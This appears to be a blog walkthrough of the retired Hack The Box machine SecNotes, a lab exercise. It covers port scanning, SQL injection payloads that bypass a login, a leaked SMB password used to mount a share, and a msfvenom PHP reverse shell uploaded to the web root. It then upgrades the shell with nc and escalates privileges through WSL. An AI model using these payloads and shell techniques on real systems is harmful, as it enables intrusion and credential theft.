This post documents the complete walkthrough of SecNotes, a retired vulnerable VM created by 0xdf, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post


SecNotes is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 --rate 1000

Starting masscan 1.0.4 ( at 2019-01-19 03:49:54 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on                                    
Discovered open port 80/tcp on                                     
Discovered open port 8808/tcp on

I’ll do one better with nmap scanning the discovered open ports.

# nmap -n -v -Pn -p80,445,8808 -A --reason -oN nmap.txt
80/tcp   open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp  open  microsoft-ds syn-ack ttl 127 Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
Host script results:
|_clock-skew: mean: 2h40m01s, deviation: 4h37m09s, median: 0s
| smb-os-discovery:
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2019-01-18T19:53:32-08:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-01-19 03:53:30
|_  start_date: N/A

It’s a Windows box alright. But, let’s go with the http services: 80/tcp and 8808/tcp. This is how they look like.

Notice the login page allows new sign up? Let’s go ahead and open Burp, and sign up a dick user for ourselves.

Login time.

It’s obvious that user tyler is present in the system. If we re-login with tyler, this is what happens.

2nd-order SQL Injection

Hmm. Let’s use wfuzz to inject common SQL injection strings into the registration page just to see what we get. Here, I’m soliciting 200 responses to see what’s going on with the registration. Typically, a successful registration will return a 302 response.

# wfuzz -w /usr/share/wfuzz/wordlist/Injections/SQL.txt -t 20 --sc 200 -d "username=dickFUZZ&password=password&confirm_password=password"

* Wfuzz 2.3.3 - The Web Fuzzer                         *

Total requests: 125

ID   Response   Lines      Word         Chars          Payload

000083:  C=200     40 L      116 W         1689 Ch        "t'exec master..xp_cmdshell 'nslookup'--"
000096:  C=200     40 L      115 W         1643 Ch        "%27%20or%201=1"
000100:  C=200     40 L      110 W         1625 Ch        "&apos;%20OR"
000105:  C=200     40 L      113 W         1637 Ch        "*|"
000104:  C=200     40 L      113 W         1636 Ch        "%7C"
000107:  C=200     40 L      113 W         1647 Ch        "*(|(mail=*))"
000109:  C=200     40 L      113 W         1654 Ch        "*(|(objectclass=*))"
000113:  C=200     40 L      113 W         1636 Ch        ")"
000115:  C=200     40 L      110 W         1625 Ch        "&"
000112:  C=200     40 L      113 W         1636 Ch        "%28"
000119:  C=200     40 L      110 W         1625 Ch        "' or 1=1 or ''='"
000117:  C=200     40 L      113 W         1636 Ch        "!"
000120:  C=200     40 L      110 W         1625 Ch        "' or ''='"

Total time: 24.13528
Processed Requests: 125
Filtered Requests: 112
Requests/sec.: 5.179139

Long story short, I tried all the payloads and ' or 1=1 or ''=' manage bypass the login and display the following notes. :triumph:

It’s the credentials that’s interesting!

Armed with this new information, we can mount the file share.

New Site

We can mount the file share with mount of course.

# mount -t cifs -o username=tyler,password='92g!mA8BGjOirkL%OG*&',uid=0,gid=0 // /mnt/secnotes/new-site

What do we have here?

Appears to be the wwwroot of the other http service: 8808/tcp. And since the site is running PHP, let’s copy a reverse shell written in PHP over to the new site. We can generate the reverse shell with msfvenom like so.

# msfvenom -p php/reverse_php LHOST= LPORT=1234 -o rev.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 3004 bytes
Saved as: rev.php


Meanwhile at my nc listener…

Awesome, but the reverse shell is pretty unstable. We need a resilient shell to conduct further enumeration.

Let’s transfer a nc for Windows over. If you are using Kali Linux, it’s at /usr/share/windows-binaries/nc.exe.

Now, once the PHP reverse shell connects back, launch nc.exe to connect back to me at a different port, say 4321/tcp.

user.txt is at tyler’s desktop.

Privilege Escalation

During enumeration of tyler’s account, I notice a shortcut (LNK) pointing to bash.exe at the Windows System32 directory.

Furthermore, \Distros\Ubuntu\ubuntu.exe is present too.

This led me to believe Windows Subsystem for Linux (WSL) is installed. Perhaps bash.exe is around somewhere as well?

Sweet. Let’s copy that to tyler’s desktop and launch bash.exe -i.

What do you know? I’m root! Man, I’m like a duck to water in the Linux environment.

Armed with the administrator password, we can now mount the C$ volume and access root.txt.